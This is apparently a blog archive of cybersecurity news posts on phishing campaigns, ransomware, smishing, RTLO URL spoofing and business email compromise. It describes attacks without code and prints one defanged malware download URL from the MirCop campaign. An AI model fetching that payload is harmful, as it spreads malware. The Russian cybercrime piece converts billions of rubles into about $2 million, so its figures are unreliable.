Search This Blog

Showing posts with label Phishing Attack. Show all posts

Mustang Panda: Chinese Threat Actor Targets Governments Worldwide

Z

The malicious advanced threat actor, Mustang Panda, has allegedly been linked to a spear-phishing attack, that is targeting governments, and academic and research sectors across the globe. 

According to Trend Micro’s report, the primary targets of the phishing attacks, between May and October 2022 included entities of countries of the Asia Pacific region like Myanmar, Australia, The Philippines, Japan, and Taiwan. 

Mustang Panda, also known as Bronze President, Earth Preta, HoneyMyte, or Red Lich, is an espionage threat actor based in China. The group is said to be active since July 2018 and is known for utilizing malware like China Chopper and PlugX in order to obtain data illegally. 

Attributes of the Phishing Attack 

The attacks involve spear-phishing emails and messages distributed via Google accounts. The fraudulent emails enticed target users, deceiving them into downloading malicious custom malware through the Google drive links. 

During the investigation, researchers found that Mustang Panda used messages consisting of geopolitical subjects, with around 84% of the attacks being targeted at governmental/ legal organizations. 

The attached link apparently directed the target users to a Google Drive or Dropbox folder, in order to evade suspicion. Furthermore, the link directed users to download RAR, ZIP, and JAR compressed files that may include malware variants like ToneShell, Tonelns, and Pubload. 

"Earth Preta abused fake Google accounts to distribute the malware via spear-phishing emails, initially stored in an archive file (such as RAR/ZIP/JAR) and distributed through Google Drive links," says researchers Nick Dai, Vickie Su, and Sunny Lu. 

Although the hackers utilized a variety of malware-loading methods, the process mainly required DLL side-loading once the target ran the executable contained in the archives. 

“In addition, the actors leverage different techniques for evading detection and analysis, like code obfuscation and custom exception handlers. We also found that the senders of the spear-phishing emails and the owners of Google Drive links are the same. Based on the sample documents that were used for luring the victims, we also believe that the attackers were able to conduct research and, potentially, prior breaches on the target organizations that allowed for familiarity, as indicated in the abbreviation of names from previously compromised accounts,” explained Trend Micro researchers.  "Once the group has infiltrated a targeted victim's systems, the sensitive documents stolen can be abused as the entry vectors for the next wave of intrusions. This strategy largely broadens the affected scope in the region involved."    

Palo Alto Network: Domain Shadowing is a Prevalent Threat

 

As per Unit 42 of Palo Alto Network’s threat analysis, a fraudulent phishing technique known as domain shadowing is wreaking havoc. The company found that around 12,197 fake domains were shadowed between 25th April to 27th June of 2022, to provide malicious content. 
 
Cyber attackers are using domain shadowing for secretive attacks. Once a threat actor gets access to/hijacks your Domain Name System, they create their sub-domains containing malicious codes under your legitimate and reputed domains to perform malicious activities. The hijacked domains tend to be used in several ways, such as escaping security checks, distributing malicious software, committing fraud, etc. 
 
It is imperative to note that the attackers prepare these shadow domains without altering the functioning of the original domains, which also serves as a safeguard, since the victims are not aware that a threat exists, and the owners of the original domains rarely check on their domains to ensure their security. 
 
However, unit 42 employs a method to detect hacked domains or illegal sub-domains. It entails going through a checklist consisting of steps such as verifying whether the IP address of the domain and the sub-domain is the same or different, verifying whether the domain and sub-domains have been active for a certain period, and verifying the patterns of the domains and sub-domains. 
 
Domain shadowing can be called a new evolution in online threats or fast flux. It has been considered the most effective and hard-to-detect technique used by any malicious attacker to date. The fraudulent actor can access and add tens of thousands of sub-domains into hijacked domains, and as they are available randomly, the next victim’s domain cannot be tracked.  
 
According to Palo Alto Network’s threat researchers, when they became aware of the deceptive phishing technique and the increasing cases associated with it, only 200 of them were potentially harmful. VirusTotal also disclosed that some of these were organized into single phishing campaigns by registering 649 fake or deceptive domains on 16 trusted websites. 
 
The shadowed domains work to steal the user’s login credentials known as the phishing technique. To protect your website or data from domain shadowing, you should adopt new-generation security measures, including connected threat intel platforms and checking on the webpage before entering the credentials.

T-Mobile Users Targeted via New Smishing Campaign

 

Threat actors are targeting T-Mobile customers in an ongoing smishing campaign with malicious links using unblockable texts sent via SMS (Short Message Service) group messages. The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) issued a warning after multiple users have filed reports of being targeted by this new SMS phishing campaign. 

"The messages vary but typically thank the recipient for paying their bill and offer a gift. The messages include a link to accept the gift," according to the NJCCIC, which operates within the state's Office of Homeland Security and Preparedness and deals with these types of incidents. “These links may lead to malicious websites intending to steal account credentials or personal information, or install malware."

Earlier this year in In March, an identical series of smishing attacks also targeted Verizon Wireless and Spectrum users, mimicking the carriers in text messages spoofed to appear like they were sent from the target's phone number. 

The Federal Trade Commission also issued a warning to T-Mobile users to watch out for fraudsters sending them texts from their numbers. "They’ve changed (spoofed) the caller ID to look like they’re messaging you from your number, but the shock of getting a text from yourself is bound to get your attention — which is what they’re after," the FTC said. 

Cybercriminals using information from previous data breaches The NJCCIC believes that the smishing campaign was likely made possible due to previous data breaches affecting the mobile carrier and millions of its users. 

Since 2018, when info belonging to 3% of T-Mobile customers was stolen by hackers, T-Mobile has disclosed five other data breaches. In 2020, T-Mobile employees' email accounts were compromised, and phone numbers and call records were accessed by unauthorized third parties.

NJCCIC meanwhile is advising T-Mobile users targeted by smishing campaigns to contact directly to official websites and avoid clicking links delivered in SMS text messages from anonymous contacts and refrain from providing critical details to unauthorized websites.

Additionally, the firm recommended users to mute the text thread to stop getting alerts if anyone replies. They can delete the message thread, too, although that won't stop new texts from arriving.

For Three Years, Leading Messaging Servers were Scammed Using a URL Rendering Method

 

A complex URL rendering method has now been revealed as the source of global phishing attacks on several popular messaging and email systems.  Whatsapp, Instagram, iMessage, Facebook Messenger, and Signal were all popular platforms. Over three years, this allegedly allowed some malicious attackers to create realistic-looking phishing texts. 

Experts feel the unexpected finding has arrived at precisely the right time. Furthermore, researchers claim so by injecting right to left override, these rendering issues generate a vulnerability in the application's interface by displaying wrong URLs (RTLO). 

Unicode Control Characters with these names render all clients more vulnerable to URI spoofing attacks. When an RTLO character is injected into a string, it enables the string to be shown right-to-left instead of left-to-right in a browser or messenger app. The majority of the time, this character is used to display Arabic or Hebrew messages. 

The majority of individuals are prime targets, with the final goal of acquiring access to phishing attempts by spoofing several well-known domains. A handful of these flaws have been awarded a CVE which affects a wide variety of IM program versions. 

  • CVE-2020-20093 — Facebook Messenger 227.0 or earlier on iOS and 228.1.0.10.116 or earlier on Android 
  • (CVE-2020-20093) CVE-2020-20094 — Instagram version 106.0 or earlier on iOS, and version 107.0.0.11 or earlier on Android C
  • CVE-2020-20095 — iOS 14.3 or older with iMessage
  • CVE-2020-20096 — WhatsApp 2.19.80 or earlier (iOS) and 2.19.222 or earlier (Android) 

Signal, thankfully, does not have a CVE because the exact attack method was made evident to them. 
The CVE IDs are  ancient as the vulnerabilities were first discovered in August 2019 by a researcher  named 'zadewg.' 

When two independent URLs are concatenated to look like a single entity, for example, if they are judged to be two different URLs. And if a person clicks on the URL on the left, they will be led to one website, whilst clicking on the URL on the right will take them to another. 

According to research, the rendering problem does not work as effectively on email platforms such as Outlook.com, ProtonMail, or Gmail. However, many people might predict a series of attacks on other IM or email apps. 

The one-liner PoC is freely available and simple to use, even for those with no technical knowledge or no hacking expertise. In fact, even when more advanced technical principles are involved, there is ample evidence of RTLO-based misuse in the field. 

Several more IM and email programs are likely vulnerable to the same exploit, but only those listed above have been proven as vulnerable. As a result, users of the listed apps should be vigilant when receiving messages with URLs, always click on the left side, and keep an eye out for app security upgrades which may fix the problem.

Baltimore City was Duped Out of $376K

 

A new report from the Office of the Inspector General (OIG) reveals that a cyber-criminal posing as a vendor duped Baltimore city out of hundreds of thousands of dollars last year. In October 2021, the OIG initiated an investigation after obtaining information from Baltimore's Bureau of Accounting and Payroll Services (BAPS) about an alleged fraudulent Electronic Funds Transfer (EFT). The Mayor's Office of Children and Family Success (MOCFS) issued the Vendor with EFT payment funds.

BAPS and MOCFS were contacted by email on December 22, 2020 and January 7, 2021, from an email address linked with an employee of the Vendor firm, asking for a change to its EFT remittance details. On December 16, 2020, the email linked with the Vendor Employee sent BAPS a Vendor Payment & Electronic Funds Transfer Form. 

The OIG later determined that the Vendor Employee's email account had been hacked by a malicious actor who had set up rules within the Vendor Employee's email account as a result of a phishing assault. As a result, the malicious actor was able to correspond with City workers without the Vendor's awareness. 

On January 5, 2021, the fraudster contacted MOCFS and BAPS once more, this time requesting that the funds be transferred to a new account at a third financial institution. As verification, the fraudster sent a bank letter and a copy of a voided check with the same details as the third account. BAPS paid $376,213.10 into the third account on January 7, 2021, believing the fraudster's assertions. 

The OIG discovered that BAPS employees do not have access to a list of authorized signatories for vendors and must rely on the information given by representatives from City agencies. Furthermore, instead of independently validating information and requests, BAPS relied on MOCFS to assist the request and accepted an incoming phone call from someone pretending to be the Vendor's Chief Financial Officer. 

In his response to this report, Director of Finance Henry Raymond notified the OIG that new protocols had been implemented requiring Department of Finance (DOF) workers to independently verify bank changes with an executive-level employee. DOF has also devised processes to exclude City agencies from vendor accounting procedures.

The Potential Damage to Russia from Cybercrime in 2022 was Estimated at 2.2 Million Dollars

 

RTM Group experts believe that the damage from criminal actions using computer technology in Russia this year will continue to grow and may reach 165 billion rubles. 

The growth will be facilitated by the low level of cyber-literacy of the population, as well as people's desire to save money in conditions of rising prices and uncertainty.

In 2021, the total amount of damage from cybercrimes exceeded 150 billion rubles ($2 million). In total, 518 thousand cyber crimes were committed last year, which is almost 2 times more than in 2019. 

According to Yevgeny Tsarev, the manager of RTM Group, the number of successful cyber attacks in 2021 increased by one-third (+35%). And in 2022 the growth of cybercrime will continue and will reach at least 30% due to the development of social engineering schemes and the use of new technologies. By the end of the year, the total damage may exceed 165 billion rubles ($2.2 million). 

Phone calls to a potential victim have become the most common way of fraud, and viruses and phishing attacks are the most popular way of stealing funds. At the same time, RTM Group experts admit that only a small part of those who suffered from the actions of criminals goes to court as they realize that money can not be refunded anyway. 

Experts agreed that fraudsters will become even more active and the growth of cyberattacks will continue since the criminal procedure law is not currently adapted to this kind of crime. In addition, law enforcement agencies do not have enough qualified personnel to carry out investigations. 

According to experts, "people now live in a state of uncertainty of prospects on the one hand, and constantly rising prices on the other," which leads to a desire to save money. And this is abused by scammers in the mail, in social networks and by phone. 

In addition, according to Kaspersky Lab experts, ransomware hackers attacked 16 thousand Russian companies in 2021, while attacks are becoming less massive and more targeted. The company clarified that in 2021 alone, 49 new ransomware families and more than 14 thousand of their modifications were discovered around the world. Before encryption, hackers steal data from companies and threaten to release it to the public unless they are paid.

The Clop Ransomware Gang Leaked Sensitive Data from the UK Police

 

Clop ransomware operators seized confidential information held by the British police, according to the media, and the cybercriminal group targeted the IT firm Dacoll. According to the media, cybercriminals used a phishing attack to compromise the company's systems, which had access to the police national computer. The Mail reported the security breach on December 19, 2021, while the gang released the stolen material on its leak site on the dark web. 

Clop Ransomware, a member of the well-known Cryptomix ransomware family, is a nasty file-encrypting virus that deliberately avoids unprotected systems and encrypts saved files by planting the .Clop extension. It uses the AES cypher to encrypt images, videos, music, databases, papers, and attaches the .CLOP or.CIOP file extension which stops victims from accessing personal information. For instance, "sample.jpg" is renamed "sample.jpg.Clop." 

Clop virus gets its name from the Russian word "klop," which means "bed bug" — an insect of the genus Cimex that feeds on human blood at night. Clop ransomware is regarded as extremely severe malware due to the virus's ability to infect the majority of operating system versions, including Windows XP, Windows 7, Windows 8, Windows 8.1, and Windows 10. 

The security breach occurred in October, when Clop ransomware operators obtained access to Dacoll data, including that of the PNC, which contained personal information and records for 13 million people. Dacoll, while confirming the data breach said, “We can confirm we were the victims of a cyber incident on October 5.”  

“We were able to quickly return to our normal operational levels. The incident was limited to an internal network not linked to any of our clients’ networks or services.” 

“The cyber-criminal gang Clop has released some of the material it plundered from an IT firm that handles access to the police national computer (PNC) on the so-called ‘dark web’ – with the threat of more to follow.” reported the Daily Mail. “Clop is believed to have demanded a ransom from the company, Dacoll, after launching a ‘phishing’ attack in October." 

Dacoll declined to pay and did not reveal the sum of the ransomware gang's demand. Photographs of motorists exfiltrated from the National Automatic Number Plate Recognition (ANPR) system, footage, and close-up images of the faces of drivers who have committed traffic offenses are among the stolen information.

West Virginia Hospitals Suffered a Data Breach Resulting from a Phishing Attack

 

A data breach occurred at a West Virginia hospital system as a result of a phishing assault, which provided hackers access to multiple email accounts. From May 10 to August 15, hackers gained access to various email accounts at Monongalia Health System, which operates Monongalia County General Hospital Company and Stonewall Jackson Memorial Hospital Company. These accounts held sensitive data from patients, providers, employees, and contractors. 

Mon Health completed its investigation into an email phishing incident that may have resulted in unauthorized access to emails and attachments in numerous Mon Health email accounts on October 29, 2021. Mon Health initially became aware of the situation on July 28, 2021, when a vendor reported not getting payment from Mon Health. In response, Mon Health initiated an investigation, which revealed that unauthorized individuals got access to a Mon Health contractor's email account and sent emails from the account in an attempt to collect funds from Mon Health via fraudulent wire transfers.

When Mon Health learned of this, it secured the contractor's email account and reset the password, alerted law authorities, and hired a third-party forensic firm to assist the investigation. The inquiry also revealed that the problem was limited to Mon Health's email system and did not touch the organization's electronic health records systems. There was also no evidence that any of Mon Health's other connected hospitals or healthcare facilities, including Mon Health Preston Memorial Hospital and Mon Health Marion Neighbourhood Hospital, were involved in or impacted by the incident. Importantly, the incident had no effect on Mon Health's services or operations or those of any of its connected hospitals or healthcare facilities. 

Patients who have been affected by the breach have been notified personally, and an assistance centre has been established to answer inquiries. Mon Health also stated that it is analyzing and improving its security processes and practices, including the implementation of multifactor authentication for remote access to its email system. 

“Business email compromise continues to be the silent killer for organizations and data breaches within various industries, including healthcare,” said James McQuiggan, security awareness advocate at security awareness training firm KnowBe4 Inc. “Utilizing a careful cynicism or a ‘trust and verify’ mindset, organizations can implement technology solutions and user processes to prevent these successful and effective attacks."

McQuiggan highlighted that, from a technological standpoint, implementing domain and sender email address verification is a straightforward patch to authenticate domains and emails and lessen the possibility of an attack by a "doppelganger domain."

Phishing Emails Deliver Scary Zombie-themed MirCop Ransomware

 

A new phishing campaign that poses as supply lists attacks users with the MirCop ransomware, which encrypts a target PC in less than fifteen minutes. 

The perpetrators start the attack by sending an unsolicited email to the victim, claiming to be following up on a previous order arrangement. The email body includes a hyperlink to a Google Drive URL that, when clicked, downloads an MHT file (webpage archive) to the victim's device. 

The use of Google Drive lends credibility to the email and is in accordance with standard business procedures. Simple but crucial choices like this can determine whether the victim clicks the URL or sends the email to the spam folder for threat actors. When people open the file, all they see is a fuzzy image of what appears to be a supplier list, stamped and signed for added legitimacy. 

When the MHT file is opened, it will download a RAR archive from “hXXps://a[.]pomf[.]cat/gectpe.rar” containing a.NET malware downloader. The EXE file in the RAR archive uses VBS scripts to drop and run the MirCop payload on the affected machine. 

The ransomware starts capturing screenshots right away, locks files, changes the background to a terrifying zombie-themed graphic, and instructs victims on what to do next. The entire procedure, according to Cofense, takes less than 15 minutes from the time the victim opens the phishing email. 

Following that, the user is only able to use certain web browsers to contact the actors and arrange for the ransom payment. The actors have no interest in infiltrating the victim's computer discreetly or staying there for long to conduct cyber espionage or acquire files for extortion. On the contrary, the attack happens swiftly, and the source of the problem is noticeable to the victim instantly. 

About the ransomware

MicroCop is an outdated ransomware strain that is used to send its victims ridiculous ransom demands. That was until Michael Gillespie broke the encryption and released a free decryptor. 

As per BleepingComputer, it was not able to verify whether that old decryptor still works with the payloads delivered in the most recent campaign, but it's possible that it can still unlock the files.

According to Cofense, the identical variant has been circulating since June of this year, indicating that MicroCop is still active and that people should be wary when dealing with unwanted emails.

Research shows that 91.5% Malware in Q2 2021 Appeared Over Encrypted Connections

 

According to the recent WatchGuard data, 91.5 percent of malware originated via encryption techniques during Q2 2021. This represents a significant increase compared to the previous quarter, implying that any organization that does not examine encrypted HTTPS traffic at the periphery is overlooking 9/10 of all malware. 

The study also showed worrisome increases in file-less malware threats, a substantial increase in ransomware, and a massive increase in network cyber attacks. “With much of the world still firmly operating in a mobile or hybrid workforce model, the traditional network perimeter doesn’t always factor into the cybersecurity defense equation,” said Corey Nachreiner, CSO at WatchGuard. 

AMSI.Disable.A appeared in the leading malware segment for the very first time in Q1 and quickly rose to the forefront this quarter, ranking second overall by volume as well as first for cumulative encoded attacks. This malware family employs PowerShell techniques to leverage various Windows security flaws, but what makes it particularly intriguing is its evasive technique. 

AMSI.Disable.A employs code capable of deactivating the Antimalware Scan Interface (AMSI) in PowerShell, enabling it to avoid script-security screening while carrying out its malware payload completely unnoticed. Within the first six months of 2021, malware observations believed to have originated from scripting engines such as PowerShell already have managed to reach 80% of last year's overall script-initiated attack volume, representing a significant increase compared to the previous year. 

In the following quarter, the said number increased by another million, indicating an aggressive course that emphasizes the evolving importance of keeping perimeter security along with user-focused safeguards. Whereas overall ransomware detections on endpoints fell from 2018 to 2020, the trend reversed in the first half of 2021, with the six-month total finishing just short of the full-year total for 2020. 

The Colonial Pipeline attack on May 7, 2021, demonstrated unequivocally that ransomware will be here to stay. The breach, which was the top security incident of the quarter, demonstrates how cybercriminals are not only targeting the most essential services – such as hospitals, industrial control, and infrastructure – but also seem to be intensifying attacks against such elevated targets. 

One of the most notable examples was a 2020 vulnerability within the popular online scripting language PHP, however, the other three aren't. A 20ll Oracle GlassFish Server vulnerability, a 2013 SQL injection flaw in the medical records application OpenEMR, and a 2017 remote code execution (RCE) vulnerability in Microsoft Edge are among them. Even though they are all out of date, they all pose a danger if not patched. 

Although it's an old attack vector that has hopefully been fixed in most systems, those who are yet to patch will be in for a huge shock if an attacker manages to get to it before they do. A very relatively similar RCE security flaw, CVE-2021-40444, hit the headlines earlier this month when it was purposefully abused in targeted attacks against Microsoft Office and Office 365 on Windows 10 computers. 

Malware designed to target Microsoft Exchange servers and generic email clients to install remote access trojans (RATs) in highly sensitive locations has recently increased. It's most probably because Q2 was the second consecutive quarter in which remote employees and learners reverted to either hybrid offices and educational environments or normally functioning on-site behavior. 

Strong security consciousness and monitoring of departing communications on gadgets that aren't essentially connected directly to the connected devices is advised in any event – or location.

Medical Data of 12,000 Patients Exposed Following Revere Health Phishing Attack

 

A healthcare employee of Revere Health, the largest healthcare firm in Utah, was targeted in a phishing email attack that exposed some medical records for approximately 12,000 patients, including patients of cardiology practice in St. George. 

According to a breach notification sent out by Revere Health on Friday, the employee’s mailbox was exposed for roughly 45 minutes on June 21 and leaked some private details about patients of the Heart of Dixie Cardiology Department in St. George. The phishing attack was rapidly identified by Revere Health IT team, which immediately secured the mailbox to prevent unauthorized access. 

After a two-month investigation, Revere Health believes the aim of the attacker was not to secure access to patient data but to use the email account to launch more sophisticated phishing email attacks on other Revere employees. The company found the patients’ data wasn’t being shared online and deemed the breach to be a “low-level risk” to affected patients. 

“From our detailed investigation of this incident, we believe that the intent of this attack was to harvest login credentials from individuals in our organization and not to gather patient information Our security logs suggest that the attacker had three objectives: (1) to spread phishing emails, (2) to gather active usernames and passwords and (3) to attempt financial fraud against Revere Health," stated the healthcare company. 

The exposed data included medical record numbers, dates of birth, provider names, procedures, and insurance provider names. According to Bob Freeze, the director of marketing and communications for Revere Health, no financial information such as credit card information was exposed by this breach of date. The company has informed the impacted patients about the situation and advised them to remain vigilant.

According to the FBI’s 2020 Internet Crime Report, there were 241,342 victims and over $54 million were lost due to these attacks. In 2020 phishing attacks increased by 99.8% from 2019 when there were 114,702 reported attacks. In 2018 there were only 26,379 phishing attacks.

Freeze says Revere Health has further strengthened its tech security protocols and will now send test-phishing emails to employees to prevent more attacks. If they click on the test emails, they will have to undergo awareness training from the group’s IT department. The company also advised its employees to review all aspects of an email before engaging with it. 

According to the Federal Trade Commission (FTC), a phishing email address often looks legitimate, but when clicked, a more sophisticated email address appears. The FTC has recommended several common techniques to avoid phishing attempts including keeping up with software updates on devices, installing security software, using multi-factor identification so it takes more than a password to log in, and backing up data regularly. Alongside, users were advised to not open any links from suspicious email addresses or phone numbers.

Google Docs Scam Still Pose a Risk

 

A phishing attack known as the "Google Docs worm" proliferated over the internet in May 2017. It impersonated Google Docs and requested full access to Gmail accounts' emails and contact lists via specific web apps. Since the requests seemed to emerge from people the target knew, the scam worked so well. If they gave permission, the software would send the identical fake email to the victim's contacts, spreading the worm further. It affected over a million accounts before Google fixed the situation. 

However, a new study suggests that the company's solutions are insufficient. Another Google Docs phishing fraud might strike at any time. 

According to independent security researcher Matthew Bryant, Google Workspace phishing and scams draw most of their efficacy from abusing legal features and services. Targets are bound to succumb to the assaults since they trust Google's services. To a great extent, the strategy puts the action outside the domain of antivirus instruments or other security scanners since it's online and controls a legitimate framework. 

In research presented at the Defcon security meeting this month, Bryant found that attackers might actually use to move beyond Google's upgraded Workspace insurances. Recent scams utilized a similar general methodology of modifying genuine Google Workspace warnings and provisions to make phishing connections or pages look more real and interesting to targets. 

All of these problems, according to Bryant, arise from Workspace's conceptual design. The same qualities that make the platform versatile, adaptive, and sharing-friendly also make it vulnerable to misuse. The risks are significant, with over 2.6 billion Google Workspace users. 

“The design has issues in the first place, and that leads to all of these security problems, which can’t just be fixed—most of them are not magical one-off fixes. Google has made an effort, but these risks come from specific design decisions. A fundamental improvement would involve the painful process of potentially re-architecting this stuff,” he added. 

Following the 2017 incident, Google strengthened the rules for applications that interact with Google Workspace, particularly those that require essential data like emails or contacts. These “Apps Script” apps can be used by individuals, although Google mainly enables them so that corporate users can modify and enhance Workspace's features. With the additional restrictions in place, if an app has more than 100 users, the developer must submit it to Google for a thorough assessment before it can be released. Meanwhile, if people try to launch an app that hasn't been approved and has less than 100 users, Workspace will display a comprehensive warning page. 

Even with those safeguards in place, Bryant discovered a flaw. Such small applications can run without notifications if a user gets one attached to a document from someone in their Google Workspace organization. The notion is that users trust their coworkers sufficiently that they don't need to bother with strict cautions and notifications. These kinds of design decisions, on the other hand, leave possible attack points. 

“The design has issues in the first place, and that leads to all of these security problems, which can’t just be fixed.” 

Bryant discovered that by sharing a link to a Google Doc with one of these applications connected and modifying the word "edit" at the end of the URL to "copy," the user who accesses the link would get a visible "Copy document" popup. One can dismiss the tab, but if a user believes a document is genuine and clicks to create a copy, they become the creator and owner of that copy. They're also identified as the "developer" of the app, which is still there in the document. The victim would see their own email address in the popup when the program seeks permission to start and acquire their Google account data without any warnings.

Although not all of an app's elements would copy over with the document, Bryant found a method around this as well. An attacker can embed lost elements in Google Workspace's version of a task automation "macro," which is quite identical to the Microsoft Office macros that are frequently exploited. 

Finally, an attacker might persuade someone inside a company to take ownership of and provide access to a malicious app, seeking access to other people's Google accounts inside the same company without notice. 

A Google spokesperson told WIRED, "We’re appreciative of the researcher’s work in identifying and reporting these risks. We are actively making further product improvements based on this research.” 

None of these flaws, according to Bryant, are exclusive to Google Workspace. He also adds that the possibility of future Google Docs phishing attacks shouldn't be a reason to worry. The classic piece of advice applies: Users should only open files they expect, and if not sure why they're getting a specific document, they should verify with the claimed sender. 

On the other hand, the findings highlight the difficulty of preventing misuse on omnipresent platforms designed for flexibility and simplicity. Even something seemingly harmless like Google Docs may rapidly become a launchpad for an attack, possibly affecting billions of people.

Kaspersky Lab detected 1,500 phishing resources targeting crypto investors

Since the beginning of the year, Kaspersky Lab has detected more than 1,500 fraudulent resources around the world aimed at potential crypto investors or users who are interested in mining cryptocurrency

Specialists of the Kaspersky Lab antivirus company warned about an increase in the volume of fraud, the potential victims of which may be crypto investors. Since the beginning of 2021, experts have identified more than 1,500 such fraudulent resources.

In addition, Kaspersky reported on its success: this year the company blocked more than 70 thousand attempts of users to go to fraudulent sites.

Criminals create phishing pages whose task is to steal private keys that allow access to all digital assets and crypto-wallets. Such web resources are usually located in popular domain zones like .com, .net, .org, .info or in cheap zones — .site, .xyz, .online, .top, .club, .live.

Kaspersky Lab noted the high level of detail of malicious sites. As an example, experts cite the loading of real data from existing cryptocurrency exchanges. This is easily explained by the higher level of technical knowledge that people interested in investing in digital currencies must have. Attackers understand this and try to improve their techniques.

Also, scammers often send notifications about fictitious sales of video cards and other digital currency mining equipment. In this case, the victim is persuaded to buy the hardware, which requires an advance payment.

As noted by experts, the topic of investing in cryptocurrencies is willingly used by cybercriminals in conjunction with the names of famous people. For example, people in the U.S. have recently lost several million dollars by being "hooked" on a scheme with the name of Elon Musk. Investors were promised a generous return on investment on behalf of the head of SpaceX.

According to the InfoWatch expert, the first wave of interest in cryptocurrencies in Russia began in 2016-2017. At the same time, fraudulent schemes aimed at deceiving people who were just beginning to get interested in digital assets, mining and blockchain platforms, as well as at deceiving the first investors became widespread.

Hacker Employ Milanote App for Spreading Phishing Email

 

The usage of collaborative applications had been a major victory with the pandemic. That incorporates Microsoft Teams, Google Meets, Zoom, and many others. Indeed, the software on the web makes brainstorming, designing, and collaborating with team members easier for all kinds of concepts. 

Milanote is among the most popular apps used in this period. It is recognized as an application for creators to note, compile and collaborate. It is used for sorting notes, gathering ideas, structuring activities - workflows, and much more. Companies mentioned, among many others, like Uber, Facebook, Google, and Nike, use it for their office routine. 

According to analysts, the Milanote app, also designated by reviewers as "the Evernote for creatives," has gained the attention of cybercriminals, that further abuse it to conduct credential-stealing campaigns that glide past secure email gateways (SEGs). 

The report compiled and published on Thursday by Avanan indicates that the hackers look to hack the victims using a simple email. The mail sent has the line of the subject as, "Project Proposal Invoice". The email body is rather explicit, only saying, “Hello. See attached invoice for the above-referenced project. Please contact me if you have questions or need additional information. Thank you.” There have been no customization, branding, or other characteristics of social engineering in the mail. 

“The email itself is pretty standard issue,” Gil Friedrich, CEO, and co-founder of Avanan stated. “It gets attention with the subject of ‘Invoice for Project Proposal.’ It’s certainly not the most sophisticated effort in the world, however, it understands what emails can get past static scanners, including, in this case, Milanote.” 

If the attachment link in the email is opened by the destination, a single-line document opens ("I shared a file with you. Click on the "Download" link (see below) with a clickable "Open Docs" button. 

Lately, the volume of these slippery phishing attacks has increased "dramatically," according to Avanan researchers. In the communication network, 1,430 e-mails were analyzed that contained a link to Milanote, and 1367 were part of the phishing campaigns (a whopping 95.5%). 

“[Most] use static scanners to scan attachments or links for malicious payloads,” according to the writeup. “In response, hackers are bypassing those detection mechanisms by nesting the payloads in deeper layers within legitimate services, fooling the static scanners. This is part of a larger trend of hackers utilizing legitimate services to host malicious content. Because the scanner doesn’t go that deep, hackers can leverage these services to host their content and easily send it to users.” 

Friedrich told that the scammers have been increasingly employing this technique in a large number of services. Another part of the development is that malicious hackers have resorted to them with the advent of collaborative platforms to create new techniques for social engineers and escape defenses. 

“We’re talking to people on Zoom, sharing thoughts on Slack, using whiteboards on Jamboard and thousands of other services. Email is still incredibly important, of course, but there are other places where information is transmitted,” he added. 

Cybercriminals may bring dangerous links to where they have been, rather than just email. It enables hackers with simple access to many of these collaboration apps. Since they did not get the same phishing training at these sites, users may have their guard down. It's an easy approach for con men to realize many of their malicious goals. Users are advised to stay alert to the Milanote attack and other similar rocketing attacks, by following the best safety practices available. 

Email Fatigue Elevates Cyber Crime Rates

 

According to research, email is indeed the most preferred medium of communication by almost 86 percent of professionals. Whilst the average office employee gets 121 e-mails a day and sends roughly 40 business e-mails, Radicati Group's 2017 study reports that 269 billion e-mails are sent daily to just over 3.7 billion e-mail users worldwide. Consequently, cyber-attacks based on email are also sky-rocketing. 

Furthermore, because of the broad shift to work from home culture due to the pandemic, more vital data is communicated through email than ever. Users can get hundreds of E-Mails every day, and it takes time and effort to screen them. 

Given the rising volume, it is no surprise that email fatigue is growing. Unfortunately, this exhaustion will make it easier for people to click a harmful e-mail, which explains why 94 percent of malware is currently sent by email. 

Email fatigue is a word used to describe a condition where email users feel overwhelmed with the emails they receive. This can often lead to unsubscriptions, low commission rates, or even a large number of spam reports. 

However, while spam is an old-school approach, it is still being used for nefarious reasons by hackers. Fake spam withdrawal is a strategy that cybercriminals employ to improve their mailing lists and validate email addresses. Whenever a user clicks on a false link in a spam email, the spammer will check for the correct emails, active, and regularly checking the email address. From there the user can receive additional malicious payloads in an email. 

Notable phishing attack includes the Five Rivers Health Centers in Dayton, Ohio where 155,000 patients details were exposed for 2 months owing to an e-mail phishing attack. And over 10,000 phishing scams exploiting common coronavirus concerns were investigated in 2020 by Her Majesty Revenue and Customs (HMRC) from the UK. 

The successful spear phishing resulted in 95 percent of the attacks on enterprise networks. The Australian hedge fund co-founder, Levitas Capital, was a target of a whaling attack in November 2020, which is a form of spear phishing. Although it cost the corporation $800,000 – a little below the initially anticipated 8 million dollars – it also resulted in a loss of the largest customer for the hedge fund. Finally, the company had to close permanently. 

In 2019, an investigation of cybersecurity indicated that 26 percent of global firms have compromised by one to ten BEC attacks (business e-mail compromise). Recent attacks by the BEC include: 

  • Barbara Corcoran's Shark Tank Host that lost $380,000, 
  • The Puerto Rican government, which amounted to $4 million; 
  • Japan's media powerhouse, Nikkei, sent $29 million in a bogus email, according to instructions.

Cyber-crime members constantly improve their email methods by playing with the emotions of a victim: causing fear, manipulating greed, benefiting from the curiosity of the individual, asking for help, or encouraging users to feel comfortable. This strategy is frequently employed by ransomware-as-a-service attackers. 

A one-and-a-done strategy never works whenever it comes to email security. Malware is passed through a single defense, hence a solution must include several protective layers. In this method, a subsequent layer stops if malware defeats a defense. 

Using a multi-layered method paired with Acronis Cyber Protect technologies, including URL filtering, may prevent harmful domains and malware downloads from being the first affected systems.

FedEx and DHL Express Hit with Phishing Attacks

 

Researchers reported on Tuesday that they discovered two email phishing assaults targeting at least 10,000 mailboxes at FedEx and DHL Express that hope to extract client's work email account. In a blog published by Armorblox, the researchers said one assault impersonates a FedEx online document share, and the other claims to share shipping details from DHL. The phishing pages were facilitated on free services like Quip and Google Firebase to deceive security technologies and clients into thinking the links were legitimate.

“The email titles, sender names, and content did enough to mask their true intention and make victims think the emails were really from FedEx and DHL Express respectively,” said researchers with Armorblox on Tuesday. “Emails informing us of FedEx scanned documents or missed DHL deliveries are not out of the ordinary; most users will tend to take quick action on these emails instead of studying them in detail for any inconsistencies.” 

The phishing email spoofing American multinational delivery services company FedEx was entitled, “You have a new FedEx sent to you,” with a date that the email was sent. This email contained some data about the document to make it seem legitimate – like its ID, the number of pages, and kind of document – alongside a link to see the supposed document. On the off chance that the recipients clicked on the email, they would be taken to a file facilitated on Quip. Quip, which comes in a free form, is a tool for Salesforce that offers documents, spreadsheets, slides, and chat services. 

